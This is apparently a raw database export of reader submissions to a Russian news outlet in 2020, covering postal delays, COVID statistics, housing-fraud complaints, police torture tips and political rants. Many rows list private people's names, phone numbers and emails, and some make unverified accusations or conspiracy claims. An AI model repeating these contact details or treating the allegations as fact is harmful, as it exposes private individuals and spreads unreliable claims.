Основными «проблемными» странами для доставки отправлений из России третий месяц являются США, Австралия, Канада, Новая Зеландия, на которые приходится более 80% наших покупателей. Между тем запрета на пересылку почтовых отправлений в эти страны нет, как и нет запрета на обработку входящих посылок внутри этих государств.
Мы считаем, что пандемия коронавируса не дает Почте права отказаться от исполнения своих обязательств. Если пересылка пассажирскими самолетами сейчас невозможна, Почта и Правительство должны найти альтернативный способ доставки отправлений, а не перекладывать эту проблему на своих клиентов. Впрочем, уже в мае альтернативу Почта якобы нашла, о чем нам удалось узнать из личной переписки с руководителем направления развития экспорта Почты России Игорем Яшиным (igor.yashin@russianpost.ru): для отправки посылок из нашей страны на другие континенты в настоящее время формируются морские контейнеры.
Прогнозов о сроках доставки посылок кораблями Почта России не дает. Также не ясно, будет ли возвращена клиентам разница в стоимости за пересылку авиа и наземным транспортом, будут ли выплачены компенсации за задержки прохождения отправлений. И вообще пока нет уверенности, будут ли эти посылки когда-либо доставлены адресатам.
Сейчас нам только остается разбираться с обеспокоенными покупателями и писать претензии на розыск каждого почтового отправления в надежде получить какие-либо ответы в течение 90 дней. А руководителям Почты России — проводить вебинары для интернет-магазинов и «кошмарить» перегруженных работой сотрудников почтовых отделений за неправильно выставленные на прилавки консервы и стиральные порошки.","9d86830b3812a248c5d96e7795df5ed4","2020-05-25 09:45:26",0,"9d86830b3812a248c5d96e7795df5ed4",1360500378
199,Александр Удиков,"89178996553",udikov@ya.ru,Обнуленная смертность в Чувашии,"Здравствуйте! 
Благодарю за ваш труд!

Отправлю вам копию своего письма в прокуратуру. Возможно, вас тоже заинтересует. Речь об ""обнуленной"" смертности в Чувашии.

Прошу провести проверку деятельности должностных лиц, ответственных за сбор информации, обработку данных и информирование населения о статистике смертности на территории Чувашской республике. Прошу также проверить правомерность действий и решений должностных лиц Минздрава и Роспотребнадзора в отношении публикации данных о смертности. 

На основе имеющихся данных можно предположить, что три недели, с 28 апреля по 20 мая о смертельных случаях в Чувашии не сообщалось, а погибшие в эти дни люди теперь фигурируют в качестве жертв внебольничной пневмонии. Прошу запросить внутренние документы этих ведомств, проанализировать их и сделать выводы. В том случае, если вина исполнителей или должностных лиц будет установлена, привлечь виновных к ответственности.

Подробнее. По официальной информации на 24 мая официально сообщалось об одиннадцати погибших от коронавируса. При этом три недели, с 28 апреля по 20 мая, о смертных случаях не сообщалось, официальная смертность от Covid-19 по Чувашии на тот момент — 8 летальных случаев. 

СМЕРТЬ 1: 15 апреля. 
СМЕРТЬ 2: 20 апреля. 
СМЕРТЬ 3: 21 апреля. 
СМЕРТЬ 4: 21 апреля. 
СМЕРТЬ 5: 21 апреля. 
СМЕРТЬ 6: 24 апреля. 
СМЕРТЬ 7: 26 апреля. 
СМЕРТЬ 8: 27 апреля. 
ПАУЗА В ТРИ НЕДЕЛИ. 28 апреля — 20 мая. Никто не умирал?!!
СМЕРТЬ 9. 21 мая. 
СМЕРТЬ 10. 23 мая. 
СМЕРТЬ 11. 24 мая.

При этом в отчёте Роспотребнадзора по Чувашии за 4 месяца 2020 прямо указано, что заболеваемость внебольничной пневмонией в апреле 2020 выросла в полтора раза по сравнению с показателями 2019 года. Указано, что это связано с коронавирусом, и что умерло 34 человека. Однако в статистике смертности от коронавируса эти цифры, если я правильно понимаю, не фигурируют. 

Считаю эту информацию общественно значимой. Буду очень благодарен, если пресс-служба вашего ведомства (аппарата, администрации) опубликует реальную статистику и инициирует не только наказание виновных, но и широкое общественное обсуждение этой темы. В этом я, блогер, готов посодействовать.

Искренне надеюсь на вашу помощь!

Александр Удиков, житель города Чебоксары
+7 (917) 899-65-53
aleksandr@udikov.ru

","","2020-05-25 16:52:16",0,"3d017482d74562d9f39e59a150655265",635995760
200,"","","","","                                              
                               ГЛУБОКОУВАЖАЕМЫЙ НИКИТА СЕРГЕЕВИЧ!
От души, вместе с сыновьями, поздравляю Вас с очередным шедевром. Вы – достойный сын своего отца и вопреки природе, очевидно, превзошли его. По крайней мере, для нашего да и последующих поколений. 
      Думаю, Вы вместе со мной довольны, что у Вас есть такие глупые оппоненты. Бжезинский – это фигня. На мой взгляд, Вы его возвеличили, подняли на такую высоту только с одной целью, чтобы было больнее падать. Обыкновеннейший человеконенавистник, наймит мечтающих о мировом господстве, мировом правительстве американских толстосумов.
Для нас более интересны доморощенные претенденты на властителей дум и душ (и грандов). Поп Гапон  не стоит внимания. В любой религиозной иерархии их пруд пруди (возьмите тех же растлителей детей и педерастов в католической церкви). С ним, вполне вероятно, скоренько разберется Патриарх. А вот двое других…
Например, Позднер. (Или Познер? Для меня более приемлем первый). Спасибо, что содрали с него маску. Хотя мне он всегда не нравился. Ясно, что его всю жизнь подкармливало, кормило российское государство (за наш с вами счет). И чем он ему (и нам) отплатил за любовь и ласку? Слегка закамуфлированным откровенным предательством. Потому что американцы больше дают? (Вот уж не в отца сын. Здесь природа не то что отдыхает, наверняка ей стыдно за такого отпрыска). Так этот пигмей, шут гороховый посмел Вас учить, образумливать и призывать к покаянию? Воистину нет пророка в родном Отечестве.
И уж совсем хорош гусь Гусев. Думается, по случаю, по-соседски Вы вполне можете поставить ему бутылку самогонки (найдете у других соседей специально, большего он не заслуживает). Есть за что, не жалко паленой. Такой фон Вам предоставил, умри, лучше не придумаешь. Когда работал (мне сейчас 81), мои статьи публиковали абсолютно все центральные газеты, в том числе и «МК». Журналисты этой газеты, по крайней мере, тогда, были очень интересными, симпатичными ребятами (надеюсь, остаются таковыми и сейчас). Заслуга в этом Гусева? Возможно. Однако это скорее вопреки. Молодость – она на то и молодость, чтобы перемалывать любые загнивающие и даже гнилые помидоры, превращая их в полноценные томаты. А сам Гусев и тогда (на мой взгляд) не срывал звезд с неба. Перепугался досмерти, трусливо поджал хвост, когда к нему в кабинет однажды вошли двое или трое типа баркашовцев.                                                                      И это когда в кабинете была вся редакционная коллегия в полном составе. (После этого нанял едва ли не военизированную охрану). Павлу просто повезло, что сумел подсуетиться и  стать во главе молодежного коллектива. 
А то, что они на Вас доносят.… Да бог с ними. Собаки лают, караван идет. Уж чего – чего, а грязь к Вам не пристанет.
Короче, гип – гип ура! И да здравствуют Ваши, Никита Сергеевич, оппоненты. Особенно глупые. Которые, как несмышленые телята, пытаются бодаться с Быком. 
ПС. Не перестаю удивляться, почему  дерьмократов (спасибо Зюганову, как нельзя более точно охарактеризовал этих уродов) до сих пор терпит Путин? (Коли говорят, что мы живем в ручном управлении). В свое время не дал повесить за ноги как Муссолини ублюдка Ельцина. (Что навсегда останется черным пятном на совести Путина. Ведь еще тогда сразу было абсолютно точно доказано, что этот полномасштабный бандит (опять молодец Зюганов) в одиночку (банда только слегка подвякивала) нанес России ущерба, вреда больше, чем обе мировые и гражданская войны вместе взятые. Доказательству была посвящена едва ли не часовая телепередача, кажется, на первом канале. Так что (под ударением), можно в том же ключе действовать до бесконечности? Пока не станет поздно эти «борцы за демократию и справедливость», если  дорвутся до власти (а такое вполне возможно при бесконечном попустительстве и триллионах США, смотри на - в Украину), не повесят самого Путина? А они это сделают с превеликим удовольствием, чего и не скрывают. И нас всех повесят, можете не сомневаться. Разве что как Гитлер пообещают оставить только рабочую скотинку (да ведь уже обещают).
 И, наконец, ППС: материться с экрана не надо, даже близко не становитесь на одну доску с такими…                                                                                     Владимир Антонов                                                                                                                                                                                                
","","2020-05-25 18:36:11",0,a33b3cfe29e3a535614cc8e81a16cd84,634166536
201,Лариса,"",kontora1000@mail.ru,"","У нас на Гаврилова в Н.Савиновском районе отключили горячую воду с сегодняшнего дня. Ранее писали, что на время самоизоляции воду отключать не будут. Что режим закончился?","","2020-05-26 11:02:43",0,"00f180ec5a58463915d0ae54196a5c3d",2956223218
202,"","","","","Проректор КФУ Межведилов заразился короной https://kpfu.ru/sveden/struct/prorektory/mezhvedilov-arif-magidinovich также заразил и водителей общего автопарка, в котором есть и водитель ректора. 1 шаг остался до Гафурова и 2 шага до Минниханова","","2020-05-26 11:29:56",0,ec2699be1dd36d45e9511d4e379f9033,3000366084
203,"","","","Аудиозапись, на которой глава Липецкой области обсуждает, как переписать статистику по коронавирусу",https://echo.msk.ru/blog/day_video/2648753-echo/,"","2020-05-26 15:22:42",0,f447dc97a1b9cb58c7766c0508a5519d,3000365069
204,Николай Яковлев,+7 927 220 7105,glavred40@mail.ru,Запрос разрешения,"Коллеги! ваше интервью настолько содержательно и полезно для знания самого широкого круга людей в связи с происходящим с коронавирусом и не только, что это побудило меня обратиться к вам за разрешением опубликовать его в Саратовской газете социально-экономической информации ""Советы. Факты. События"" (""СОВФАКС""), издаваемой с августа 1990 года и все эти годы не финансируемой властью, партиями, олигархами, ориентированной на трудовые коллективы по договорам социального партнерства. Газета безгонорарная. Её учредители и издатели сами журналисты. как и редакции в организационно-правовой форме НКО ""Редакция ""СОВФАКС"".
Мы обязательно укажем источник и, конечно, авторство.
Можете дополнить интервью.
В случае согласия прошу уведомить об этом по адресу электронной почты.
С уважением, 
Н.ЯКОВЛЕВ, главный редактор","","2020-05-27 19:20:31",0,e6e38887c826df8248ee53874a5e5b71,1427809481
205,"","","","","Согласно отчету ФБР в .американском банке Голман Саксе лежат 2 трлн.дол. СССР которые вывез с корешами под проценты Горбачев МС и только он знает номера счетов ,подоплеку всему этому.","","2020-05-28 00:01:24",0,"8c515cd4d6642f7dad614b8aebdb2f81",2965631951
206,"","","","",конечно!,"","2020-05-28 07:16:15",0,"43344709d07b20454cbd359a9e475fe7",90511135
207,"","","","",rjytxyj!,"","2020-05-28 07:19:00",0,"43344709d07b20454cbd359a9e475fe7",90511135
208,Наталья,"89252374320",gid.caricyno@gmail.com,Дольщики ЖК Царицыно 23.05.2020 направили открытое письмо в Сми с требованием не допустить назначения Тимофеева на должность главы Фонд защиты прав дольщиков,"Президенту РФ Путину Владимиру Владимировичу
Председателю Правительства РФ  Мишустину М.В.
Председателю Следственного Комитете РФ  Бастрыкину А.И.
Генеральному прокурору РФ Краснову И.В.
Генеральному директору АО «ДОМ.РФ» Мутко В.Л.  
от участников долевого строительства жилого комплекса Царицыно,
находящегося по адресу: г.Москва, ул. 6-ая Радиальная, вл.7

«Исполнение Поручений Президента РФ №1520 от 03.08.2016, №1329 от 09.07.2017, № Пр-1076 от 26.06.2018г.»

Уважаемые Владимир Владимирович, Михаил Владимирович, Виталий Леонтьевич, 
Александр Иванович, Игорь Викторович,

В 2017 году Правительством РФ при АО ДОМ.РФ в Москве был создан Фонд защиты прав дольщиков. Генеральным директором Фонда до мая 2020 года являлся Говорун Олег Маркович, под руководством которого так и не были запущены стройки, а компенсации получили лишь считанные единицы. В настоящее время в СМИ фигурирует информация, что Говорун О.М. уволен с занимаемой должности Председателем наблюдательного совета Хуснуллиным М.Ш. и что его место 25 мая 2020г займет бывший глава Комитета по обеспечению реализации инвестиционных проектов в строительстве и контролю в области долевого строительства г.Москвы (МОСКОМСТРОЙИНВЕСТ) Константин Петрович Тимофеев.
Для дольщиков ЖК Царицыно предложение назначения Тимофеева К.П. на должность Главы Фонда защиты прав дольщиков является возмутительным, т.к. за годы работы Тимофеева К.П. на посту Председателя Москомстройинвеста (2011-2018) число обманутых дольщиков увеличилось в Москве многократно. Появились крупнейшие долгострои Москвы, такие как ЖК Царицыно, ЖК Терлецкий парк, ЖК Шишкин лес, ЖК Бабушкинский парк, ЖК Скай-Хаус, ЖК Академ-Палас и прочие.  Всего в Москве при таком вот «контроле» контролирующего долевое строительство органа Москомстройинвест не достроено 35 объектов. Только в одном ЖК Царицыно нарушены права на жилье 5841 граждан; по Москве же общее количество обманутых дольщиков составляет около 100 000 человек. 
Ввиду некачественного контроля за деятельностью застройщика и нецелевым использованием денег дольщиков со стороны Председателя контролирующего долевое строительство органа Москомстройинвест  Тимофеева К.П., причинен не только имущественный, моральный, физический, непоправимый вред гражданам –участникам долевого строительства, но и колоссальный ущерб казне Москвы, авторитету органов государственной власти.
Участники долевого строительства уверены, преступления по выводу денежных средств дольщиков со строек столицы не могли быть возможными без покровительства и личной заинтересованности руководства Москомстройинвест, а именно Тимофеева К.П, Гончарова А.А., Безуса О.Е., вкупе с застройщиками, высокопоставленными чиновниками Стройкомплекса, Государственной Думы и банками. Подтверждением данного факта явилось возбуждение уголовного дела на высоком уровне - в Следственном Комитете РФ под личным контролем Бастрыкина А.И. 15.05.2018г. им было возбуждено уголовное дело № 11802007706000067 в отношении должностных лиц Москомстройинвест (МКСИ) по факту злоупотребления должностными полномочиями по ч. 1 ст. 285 УК РФ. 

Из сотен заявлений дольщиков ЖК «Царицыно», 33-х томов материалов дела в разработке Следственного комитета, а также постановления о возбуждении указанного уголовного дела следует, что должностные лица МКСИ, как государственного органа по контролю в области долевого строительства, уполномоченного на осуществление контроля за целевым использованием застройщиком уплачиваемых участниками долевого строительства денежных средств, соблюдением застройщиком требований законодательства, графиков реализации проектов строительства, имели право на проведение проверок застройщика, право обращения в арбитражный суд с заявлением о приостановлении деятельности застройщика в случае выявления нарушений, в том числе не соблюдении нормативов финансовой устойчивости, но грубо нарушили возложенные на них обязанности.

Несмотря на выявленные систематические грубые нарушения законодательства со стороны застройщика АО «МКХ» и наличие достаточных оснований для приостановления в судебном порядке деятельности застройщика, должностные лица МКСИ, используя свои служебные полномочия вопреки интересам службы и возложенным на них обязанностям, осознавая общественную опасность своих действий (митингов, пикетов, акций у стен Правительства Москвы и Аппарата Президента), предвидя и желая наступления общественной опасных последствий, действуя из иной личной заинтересованности, не реализовали свои вышеуказанные должностные полномочия, что повлекло расходование застройщиком денежных средств дольщиков ЖК Царицыно в сумме более 20 млрд. руб. на цели, не связанные со строительством, а иными словами их хищение  мошенническим путем руководством бывшего застройщика ЖК Царицыно АО «МКХ» Пинкевича И.К., путем вывода через аффилированную организацию ЗК «Настюша» в обход статьи 18 214–ФЗ в офшоры ( компанию BRODA AGRO TRADE (CYPRUS) LIMITED), что привело к увеличению числа обманутых дольщиков,  к социальной напряженности и  подрыву  авторитета органов исполнительной власти.  

Для нас, дольщиков ЖК Царицыно, назначение К.П. Тимофеева на любую руководящую должность является оскорбительным вызовом. Покуда в высших эшелонах власти будут такие как Тимофеев К.П. и Гончаров А.А, никакие изменения в положительную для дольщиков сторону будут невозможны! 

Дольщики уверены, что в фонд будут направляться бюджетные средства, но до проблемных объектов они не будут доходить. Как и ранее в истории с Москомстройинвестом в Фонде будет создаваться имитация бурной деятельности, но при отсутствии уголовной ответственности чиновников и продолжающегося «несовершенства законодательства» фонд будет использовать эти деньги не по назначению. Уже проектом N 681472-7, внесенным депутатом Государственной Думы Николаевым Н.П., «предусматривается, что фонд субъекта РФ может выступать в качестве застройщика и осуществлять деятельность по завершению строительства объектов незавершенного строительства и объектов инфраструктуры», а соответственно может и не выступать….

Такие чиновники как Тимофеев К.П. не в состоянии контролировать целевое использование выделенных на завершение строительства бюджетных средств, и покуда на руководящих постах будут находиться такие бездействующие в своем контроле чиновники, нам не помогут ни счета- эскроу, ни Фонд защиты дольщиков, ни иные нововведения! Проводя подобные кадровые назначения, руководители не решают проблемы обманутых дольщиков, а лишь усугубляют их. 
О необходимости контроля за динамикой строительства, расходованием бюджетных средств, выделенных на достраивание проблемных объектов дольщики ЖК Царицыно указывают во всех своих обращениях.  Ведь  несмотря на «все принятые градостроительные решения», принятую адресную инвестиционную программу (постановление Правительства Москвы от 9 октября 2018 г. N 1233-ПП ""Об Адресной инвестиционной программе города Москвы на 2018-2021 годы"" в редакции от  31 июля 2019 г. N 974-ПП)  и перечисление бюджетных денежных средств на достройку ЖК Царицыно в 2019году  в полном объеме (7,5 млрд рублей),  дольщики корпусов  №№ 1, 2, 3, 4, 11 , 23, 24, 25, 27, 28/29, 30, 31, 35   так и не получили ключи от оплаченных квартир…. 

Руководить Фондом должна не очередная «вороватая рука», а человек, знающий изнутри проблемы обманутых дольщиков, прошедший все этапы долгостроя, заинтересованный в конечном результате-  введению жилья в эксплуатацию, получению дольщиками ключей или справедливой рыночной денежной компенсации.

Людям с сомнительной репутацией не место в высших эшелонах власти.

Требуем:
-  не допустить назначение на должность Генерального директора Фонда защиты прав дольщиков бывшего Председателя контролирующего долевое строительство органа Москомстройнвест К.П. Тимофеева;

- запретить Тимофееву К.П. занимать какие-либо руководящие посты из–за колоссального ущерба, нанесенного казне Москвы и конституционным правам сотен тысяч граждан- участников долевого строительства; 

-  рассмотреть на должность Генерального директора Фонда защиты прав дольщиков кандидата, ничем не скомпрометировавшим себя перед обманутыми дольщиками, не использующим ложь и обман для оправдания своего бездействия   и нежелания решать проблемы из-за некачественного контроля за деньгами сотен тысяч граждан-участников долевого строительства;

- Следственному комитету и Генеральной прокуратуре РФ взять на особый контроль деятельность Фонда защиты прав дольщиков, систематически проверять результативность работы фонда касательно решения проблем обманутых дольщиков и целевое использование средств бюджета РФ.

Приложение:
постановление о возбуждении уголовного дела 11802007706000067 в отношении Москомстройинвест

Участники долевого строительства ЖК Царицыно

","","2020-05-29 00:47:23",0,fb0f555255ece704f6e12bad40701907,2959315316
209,Наталья,"89057554290",abc177@inbox.ru,Справка о зарплате Тимофеева К.П.,"Есть много что рассказать, материалы по уголовному делу  11802007706000067 в отношении Москомстройинвест готова предоставить","59343f119ec7dd3de934c732a903f696","2020-05-29 09:29:18",0,"59343f119ec7dd3de934c732a903f696",2959315316
210,Наталья,"89057554290",abc177@inbox.ru,Справка о зарплате Тимофеева К.П.,"Есть много что рассказать, материалы по уголовному делу  11802007706000067 в отношении Москомстройинвест готова предоставить","59343f119ec7dd3de934c732a903f696","2020-05-29 09:30:06",0,"59343f119ec7dd3de934c732a903f696",2959315316
211,Роберт,"9033063727",megioner@gmail.ru,"Девять лет спустя: на пытки в отделе полиции ""Дальний"" пожаловались сразу несколько казанцев","В деле Алексея Назарова открылись новые подробности
На сегодня не менее пяти свидетелей заявляют следствию о том, что показания из них тогда выбивались пытками и угрозами — причем специфический почерк отдела полиции ""Дальний"" вполне узнаваем. В частности, один из свидетелей вспоминает, что полицейские пообещали изнасиловать его рукояткой швабры. Причем, как следует из рассказа свидетелей, оперативники просто задерживали всех тех, кто, как они считали, имел отношение к ""Седьмовским"", доставляли в отдел и там ""кололи"", рассказывая задержанным, параллельно с пытками и угрозами, ""как всё было на самом деле"". Эту в буквальном смысле вбитую в них версию задержанные потом и повторяли.","","2020-05-29 16:16:41",0,fe3b55fd36475973d95bfc45efc5b156,1435239122
212,Лидия,"9051396982",yar_lidia@mail.ru,КОРОНАВИРУС,"https://youtu.be/Au53NHGkyBA

Сергей Рябухин и Владислав Ласкавый. Российскому препарату 30 лет и он спасёт от коронавируса - YouTube","","2020-05-30 23:23:46",0,"9d06224a8a88e35400680f481994bad4",94755298
213,"","","","","Вот  как  легко  народ  загнать  в  стойло  ,а  быки  и  носороги  отвечали  из  берлоги  ,мы  врага  бы  на  рога  да  только  шкура  дорога  ,плодите  тараканов    вроде  Сталина    ,Ельцина  ,путина    как  своих  мозгов  не  хватает  .","","2020-06-01 07:51:43",0,"0bcea1435b9e463142972e4b623d47ff",775483635
214,"","","","","Вот  как  легко  народ  загнать  в  стойло  ,а  быки  и  носороги  отвечали  из  берлоги  ,мы  врага  бы  на  рога  да  только  шкура  дорога  ,плодите  тараканов    вроде  Сталина    ,Ельцина  ,путина    как  своих  мозгов  не  хватает  .","","2020-06-01 07:51:57",0,"0bcea1435b9e463142972e4b623d47ff",775483635
215,Александр,"89061171264",alexander005@mail.ru,Нашествие гусениц ,"Доброго дня.
БО просьба описать, как у нас в Татарстане ведется (не ведется) борьба с гусеницами. В Бугульминском районе их уже туча и они поедают  деревья. Скоро у нас будет пустыня и это только начало лета.    ","","2020-06-01 10:06:20",0,"90af1a5b9d2bb7943142dd61b2f54d7a",1508408090
216,Рамиль,"89534052785",nur_tv@mail.ru,Бывший зам.председателя АС РТ Кочемасова Л.А.,"Как то быстро ушла сама с должности зам.преда АС РТ, не подавая на второй срок, один из столпов АС РТ, Кочемасова Л.А. На процессах, где она председательствовала, и которые первоначально были связаны со спорами с налоговыми органами, мне неоднократно приходилось участвовать. Её отличали глубокое уважение к участникам процесса, отличное знание материала, и самого дела. Приходилось разговаривать лично. Помню, по какому-то делу, пришел с ней посоветоваться (тогда можно было зайти и поговорить немного, сейчас это вообще нельзя), она говорит: ""Я не помню, такое количество дел, отписала- и забыла"". Там в итоге штраф остался более 100% от суммы налога (тогда такой был Закон), дело в итоге дошло до КС РФ, было вынесено определение, а потом сумму штрафа ограничили 20%, 40%. После её судебных решений, вне зависимости от результата, не было никаких обид, так грамотно она вела процесс.  Прошу разыскать её, взять интервью, узнать, куда она пошла работать или решила побыть в отставке.","","2020-06-02 08:37:57",0,"8293ee0b964c6fc803f2964acfc45027",2999835842
217,Аноним,"","","Архитектурный конкурс в Альметьевске завершен 29 мая, но все молчат","29 мая прошло (или нет?) заседание жюри, где должны были выбрать победителя архитектурного конкурса на разработку мастер-плана долины реки Степной Зай в Альметьевске. В этот день организатор (Агенство стратегического развития ""Центр"", Сергей Георгиевский) анонсировал в instagram, что скоро в прямом эфире выберут победителя. И все, никто ничего не говорит, в самом Центре по телефону сказали, что не могут ответить что вообще происходит. Тем временем жители города ждут объявления победителя. Конкурс и так окутан скандалами и нарушениями правил, а сейчас организатор подливает масла в огонь. Заказчик Татнефть уже высказывала недовольство выбором финалистов конкурса и свои сомнения насчет качества их будущей работы.","","2020-06-02 11:02:04",0,ed282ec22e082f2ab5b17d788dcfdcf3,2956685439
218,anatolii,"0955183094",ads@storm-media.com.ua,Сколько будет стоить разместить эту статью ? Хочу чтоб были ссылки в тексте,"Перепланировка квартир. Что можно и что нельзя делать. 

Покупая квартиру, мы в первую очередь обращаем внимание на ее планировку. И это не удивительно, ведь каждый из нас по своему представляет себе идеальное расположение комнат, кухни и санузла. Зачастую, метраж квартиры не позволяет существенно увеличить пространство комнат. Но если пустить в ход фантазию или привлечь дизайнера, можно воплотить самые смелые идеи даже в небольшой квартире и создать комнаты с идеальным метражом и расположением. 

Перепланировкой называются любые изменения изначального расположения стен и комнат квартиры. Даже самые, казалось бы, незначительные изменения могут привести к серьезным последствиям.  Поэтому крайне важно детально изучить этот вопрос перед тем как приступить к ремонту. 

Зачастую, делая ремонт, мы не задумываемся какие последствия повлекут за собой  внесенные нами изменения. Согласно распоряжению министерства регионального развития, строительства и жилищно коммунального хозяйства Украины № 404 от 09.08.2012г. о проведению технической инвентаризации, существуют перепланировки, для выполнения которых требуется наличие разрешительных документов и такие, где получать разрешение не обязательно. Чтоб получить детальную консультацию по запланированным изменениям нужно обратиться в департамент государственного архитектурно-строительного контроля в вашем городе. Первым этапом нужно подготовить проект на реконструкцию квартиры и согласовать его с представителем бюро архитектуры. Инструктор детально изучает документы, планировку дома, просчитывает риски изменений и выдает разрешение, если это не запрещает законодательство. 

Давайте разберемся, какие перепланировки обязательно нужно согласовывать с представителем Бюро Архитектуры. В противном случае, при проведении инвентаризации будет поставлен штамп “самовольно перепланированное помещение” и вас обяжут выплатить штраф и вернуть сделанные изменения назад.

Объединение комнаты и кухни в однокомнатной квартире с газовой плитой.
Присоединение балкона/лоджии к остальной площади квартиры путем демонтажа дверей, окна или части стены.
Изменение положения входных, межкомнатных дверей в несущих конструкциях. Демонтаж несущих конструкций
Изменения предназначения помещений, например перенос кухни в жилую комнату, перенос санузла “мокрой точки”.

Каждый случай нужно рассматривать в отдельности. Так как любые изменения могут нарушить целостность конструкции многоэтажного дома и негативно отразиться на вашей безопасности и других жильцов. 
Но также есть ряд перепланировок, которые по инструкции БТИ разрешены. Для их узаконивания достаточно переделать техпаспорт на квартиру и получить справку из БТИ, о том, что их делать не запрещено.

Для того, чтоб не переделывать ремонт лишний раз и не платить заоблачные штрафы в государственные инстанции, обратитесь за бесплатной консультацией к специалистам БТИ Онлайн. Поможем решить вопрос с уже выполненной перепланировкой, расскажем как узаконить и получить документы с обновленными площадями квартиры. 

Файл со ссылками https://docs.google.com/document/d/1D8VFoElRiG0M6j_grjL3gjz2YXhaQvz5IOzCxcjy6q8/edit
","","2020-06-03 14:33:25",0,"8214a7572f480a62313258b79b832a29",3118123009
219,"","","","",https://media.kpfu.ru/news/kfu-vyigral-grant-bolee-15-milliarda-rubley-na-obnovlenie-pribornoy-bazy,"","2020-06-03 19:22:23",0,b41fe21fe8b0a374bd3b767f8c28a72f,2556011364
220,Екатерина,"89149241791",cherkashina.49@mail.ru,"","   Человек питается информацией от СМИ,  телевидения,  интернет, где все вещают одно и тоже, сея   страх и панику в людях.  Человек   мыслящий,  думающий, анализирующий    включает логику: ""А  так ли страшен Корона вирус?"" Может это как раз  вирус снимает с нас корону, которую мы носим  величественно на голове, которая  пустая.    Четыре месяца слышать бредни  от власти, это как же можно так себя запугать и людей? А причина  одна, Корона вирус поедает нашу внутреннюю пустоту, без духовность. Чем мы живём? 
Больше денег, большой дом,  больше шмоток,  а человечность уходит. Иллюзия счастья. 
Человек не замечает, как  всё больше и больше погружается только в материю,  отсюда и болезни, и  психи, убийства и прочее.   Мир старый рухнул, его нет, а мы  продолжаем мыслить так же, жить по-старому, лишь бы мне хорошо. Мой дом, моя крепость. А уже по-старому не получится. Создателя поддержки на это нет,   нам надо строить новый Мир, новое общество, новую Цивилизацию!!!  Революции мы проходили,  нам нужен Эволюционный путь развития каждого человека.  Каждый человек важен на земле, потому что он частичка  Создателя.  Мы вспоминаем Создателя всуе многие. А Жизнь даётся свыше!!!  И на Жизнь даётся свыше.
И вот здесь  непочатый край работы для учёных, молодёжи, деток, подрастающих. А люди ждут новые Идеи. А просто слышать: "" Поднятие ВВП, Экономики, соц. пакеты,  повышения  пенсии на  200 рублей в год,  устали люди это слушать,  как устают  от заезженной пластинки. Благодарю за вашу  статью. 
","","2020-06-03 19:56:14",0,"1995e0cef7dbfdd4c20244bb1d82c143",1347676934
221,Сергей, ,serg.kzn@mail.ru ,"","Есть информация, что от ковида умер анестезиолог из 16 гор.больницы. Нуждается в проверке.","","2020-06-03 23:12:24",0,"9bbb3e50531c6e432a68238e04227d58",520982635
222,"","","",Свердловские депутаты отказали в доверии Путину,"Уралинформбюро
","","2020-06-04 11:40:25",0,"3297e9f8c0663e83ffda36aad3c300b6",1588912624
223,Радик,"89172689454",radik.2507@mail.ru,Запуск социальной благотворительной акции,"Добрый вечер. Я хочу запустить социальную благотворительную акцию.
Акция предназначена помощь жителям республики преодолеть тяжелые финансовые трудности. Мы сделаем страховые услуги физическим и юридическим лицам без наценок.
Допустим страховка имущества стоит например 20 000 рублей. В данной сумме заложены определенный коэффициент где одна часть например комиссия страхового агента 35%, а 65% это часть страховой компании. 
Мы же решили сделать скидку в размере 35%, то есть 7000 рублей не берем свои агентские. 
Убрали свою комиссию в помощь жителям республики.
Я считаю, что во время безденежья как раз и необходима помощь.
Для семей эти 7000 рублей это не малые деньги. А если привезти пример по юридическим лицам там может доходить экономия и до 500 000 рублей. Вряд ли предприниматели у которых на данный момент настает красная линия откажутся от этих денег. Может мои вклад спасет хотя бы одну компанию, которая кормит не одну Татарстанскую семью. Мне тяжело представить, что может случиться. Я не ставлю цели заработать, если у меня получиться реализовать свои планы, возможно мир станет чуточку лучше.  
Если данная акция пройдет успешно, планирую запустить иные более глобальные акции.
Благодаря которым жители родной республики смогут безболезненно пережить эти тяжелые времена.

Запустили социальную бесплатную акцию во время пандемии. Страховка с дисконтом от 20% до 75% от старой Вашей страховки. Страховка осаго, каско, дмс, страхование движимого и недвижимого имущества, страхование финансовых рисков, страхование бизнеса.

Приведу простой пример:
Семья из 4 человек 
Папа мама сын и дочка
Допустим:
Взрослые зарабатывают в месяц по 30 000 рублей
В сумме это 60 000 рублей
И больше доходов в семье нет

Теперь подсчитаем расходы:
Коммунальные услуги уходят                                        - 8 000 рублей
Транспортные услуги, допустим авто 
(бензин, автомойка, текущий ремонт, обслуживание) - 7 000 рулей
Продукты питания                                                          - 15 000 рублей
Школа, детский сад                                                        - 5 000 рублей
Покупка одежды                                                             - 5 000 рублей
Непредвиденные обстоятельства                                 - 3 000 рублей
ипотека, кредиты                                                            - 15 000 рублей
___________________________________________________________
Расходы:                                                                        58 000 рублей

Итог 60 000 – 58 000 = 2000 рублей в месяц остается в семье

По-Вашему, это нормально?
А есть семьи которые держатся на плаву только благодаря своим бабушкам и дедушкам которые помогают как могут.
 
Мы предлагаем другой подход.

С расходов с 58 000 можно ежемесячно оставлять до 15 000 рублей

При нашем примере при доходах в 60 000 рублей это 720 000 рублей в год
Расходы составляют 58 000 рублей это 696 000 рублей
Остается в год 24 000 рублей

Мы же предлагаем иной подход, когда у Вас за год заработаете до 180 000 рублей - а это отпуск, образование детей и т.д.

И все это при зарплате от 30 000 рублей в месяц
    
Данные примеры приведены, чтобы показать на выдуманном примере как можно жить и на зарплату по 30 000 рублей не ущемляя себя ни на чем, все те же товары и услуги

Я очень надеюсь, что смог донести мысль, что не важно сколько зарабатывать, а задача стоит сколько остается после дебита и кредита в семье. Мы нация финансово не грамотная и я считаю, если изменить данную проблему, то многие проблемы сами собой отпадут. И чтобы реализовать свои планы по улучшению состояния жителей взять хотя бы например Казани то это очень большой шаг и громадный рывок к экономической стабильности Великой нашей страны.
Всё в наших руках и считаю не нужно винить политиков и чиновников что довели до этого, а пора уже брать в свои руки будущее наших детей.




","","2020-06-05 01:50:01",0,"5297954f4a9b4c5cd32dca7ab67f4fbf",1467332991
224,Александр ,"89991623112",aznabaevaleks@gmail.com,КП Новые Салмачи,"Приглашаем Вас на собрание жильцов КП Новые Салмачи.
Тема: состояние, а точнее отсутствие дорог. Статус дорог частная собственность, то есть, мы жильцы, не имеем права даже ремонтировать их своими силами.
  Вчера представитель собственника дорог, пояснил нам, что ремонт если и будет, то восприниматся должен, как подарок. 
